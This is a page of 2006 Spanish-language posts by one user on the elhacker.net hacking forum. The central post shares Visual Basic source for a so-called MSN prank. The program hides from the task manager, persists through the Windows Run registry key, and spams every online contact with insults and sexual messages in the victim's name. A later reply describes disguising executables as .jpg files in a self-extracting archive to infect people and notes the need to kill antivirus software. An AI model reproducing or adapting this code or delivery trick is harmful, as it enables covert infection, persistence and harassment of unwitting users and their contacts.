elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: 1 ... 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 [83] 84 85 86 87 88 89 90 91
821  Informática / Tutoriales - Documentación / Re: TUTORIAL PROGRAMACION BAT en: 2 Marzo 2006, 14:56 pm
Bueno puedes hacer esto:

:mirar
If exist "CARPTEADELPC" (goto existe) else (goto noexiste)
:existe
Copy /y bla bla bla
goto fin
:noexiste
ping 127.0.0.1 -n 50 (espera 50 segundos y lo vuelve a intentar)
goto mirar
:fin
exist

Es bastante sencillo este programita, pero weno...Se puede modifikar a tu gusto...

Salu2

Hendrix

822  Programación / Programación Visual Basic / Re: [Broma para MSN]: MSN fucker By Hendrix en: 2 Marzo 2006, 14:52 pm
me caen mal los que intentan de aparentar algo que no son

A que te refieres????

Salu2

823  Programación / Programación Visual Basic / Re: [Broma para MSN]: MSN fucker By Hendrix en: 2 Marzo 2006, 14:27 pm
Amigo robokop, lo uniko que no es mio es el kode del insultador (que es de Kizar) y las Apis del MSN, que lo sake de un manual de Buskapina, la idea principal es mia, y kreo que komo tal, tengo derecho a postearles las dudas que tenga y el kdoe que e mezclado yo.

Yo no pretendo que todo el mndo vea que este programa esta echo por mi, esto no em interesa, lo uniko que pretendo es tener el kode de este programa bien echo. Nada mas... ;) ;) ;) ;) ;) ;) ;)

Weno, Salu2

Hendrix

824  Programación / Programación Visual Basic / Re: [Broma para MSN]: MSN fucker By Hendrix en: 1 Marzo 2006, 23:08 pm
El timer 3 lo que hace es pasado 1 minuto activar los timers 1 y 2....

Salu2

Hendrix

825  Programación / Programación Visual Basic / Re: [Broma para MSN]: MSN fucker By Hendrix en: 1 Marzo 2006, 19:57 pm
La verdad, no veo el error....

Help plis... ;) ;) ;)

Enga, Salu2

Hendrix

826  Programación / Programación Visual Basic / Re: [Broma para MSN]: MSN fucker By Hendrix en: 1 Marzo 2006, 12:07 pm
Weno pondre un trozo del texto de buskapina:

Citar
Bueno, antes que nada, crean el proyecto y van a "Proyecto/Referencias" y buscan "Messenger Api Type Library", "Messenger Private Type Library" y "Messenger Type Library". Todo esto teniendo en cuenta que el "Windows Messenger" està instalado

Estas son las referencia a agregar, si lo kompilo asi no me da error... :-\ :-\ :-\

Salu2

Hendrix

827  Programación / Programación Visual Basic / Re: [Broma para MSN]: MSN fucker By Hendrix en: 1 Marzo 2006, 12:02 pm
Las referencias ya las agregue, el kode que me as mostrado es de un Texto de Buskapina, pero ahora lo korrijo... ;) ;) ;)

Salu2

Hendrix

828  Programación / Programación Visual Basic / Re: [Broma para MSN]: MSN fucker By Hendrix en: 1 Marzo 2006, 00:55 am
 :o :o :o en donde esta el error????

Lo e mirado y no lo veo... :-\ :-\ :-\

Weno, lo repasare...

Salu2

Hendrix

829  Programación / Programación Visual Basic / [Broma para MSN]: MSN fucker By Hendrix en: 28 Febrero 2006, 20:45 pm
Weno, os dare el kode de un simple programa que e programado en 10 minutitos (lo que hace el aburrimiento..jajajaja  ;D ;D)

Las caracteristikas de este programa son:

- Se ejekuta cada Sesion
- 10 insultos (de Kizar y algunos mios)
- Cambia el Nik del MSN por un insulto
- Envia cada 20 segundos Un mensage a todos los usuarios agregados con un insulto
- No aparece en el Taskmanager
- La activacion es retardada (espera 1 minuto a activarse todo)

Weno, les dejo el kode:

Código:
Option Explicit
Public WithEvents MSN As MessengerAPI.Messenger
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer
Dim Men As String, Palabra As Long
Dim KeyResult As String
Dim contactos As MessengerAPI.IMessengerContact
Dim user As IMessengerContact
Dim I As Integer





Private Sub Form_Load()
On Error Resume Next
App.TaskVisible = False
Dim Hendrix
Set MSN = New MessengerAPI.Messenger
Set Hendrix = CreateObject("WScript.Shell")
Hendrix.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Win32", App.Path & "\" & App.EXEName & ".exe"
End Sub

Private Sub Timer1_Timer()
On Error Resume Next
Palabra = Int((Rnd * 10) + 1)
Select Case Palabra
Case 1
        Men = "k te jodan!!"
Case 2
        Men = "Idiota"
Case 3
        Men = "Hijo de p**a"
Case 4
        Men = "Me cago en tu p**a madre"
Case 5
        Men = "Cabron"
Case 6
        Men = "Me la kieres chupar???"
Case 7
        Men = "Me cago en la p**a zorra de tu madre"
Case 8
        Men = "Me cago en tus muertos!!!!"
Case 9
        Men = "Hijo de la gran p**a!!!!"
Case 10
        Men = "La zorra mas grande del planeta??? TU p**a MADRE!!!!"
End Select

KeyResult = GetAsyncKeyState(13)
    If KeyResult = -32767 Then
         SendKeys Men & "{enter}"
    End If

MSN.OptionsPages 0, MOPT_GENERAL_PAGE
SendKeys (Text1.Text & "{ENTER}")



End Sub

Private Sub Timer2_Timer()
On Error Resume Next
For Each user In MSN.MyContacts

If contactos.Status = MISTATUS_ONLINE Then
List1.AddItem contactos.SigninName
End If

For I = 0 To List1.ListCount - 1
MSN.InstantMessage List1.List(I)
SendKeys (" Kieres follar konmigo?? Soy un kapullo!!!! [Infectado kon un programa de Hendrix] ")
SendKeys ("{ENTER}")
Next
Next

End Sub

Private Sub Timer3_Timer()
On Error Resume Next
Timer1.Enabled = True
Timer2.Enabled = True
End Sub

Tienen que agregar esto:

1 Textbox
1 Listbox
3 Timers

Y ya sta, si ven algun error posteadlo...

Salu2

Hendrix

830  Programación / Programación Visual Basic / Re: Crear un Joiner en VB en: 28 Febrero 2006, 13:26 pm
Esto se puede hacer kon un smple SFX (se krea kon el WinRar), pones los juegos.exe a juegos.jpg y kreas un .bat que los renombre a .exe y ya ta, ya stan infectados...aunke tendrias que matar los AV's....

Pero weno, esto se desvia del tema....

Salu2

Hendrix

Páginas: 1 ... 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 [83] 84 85 86 87 88 89 90 91
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines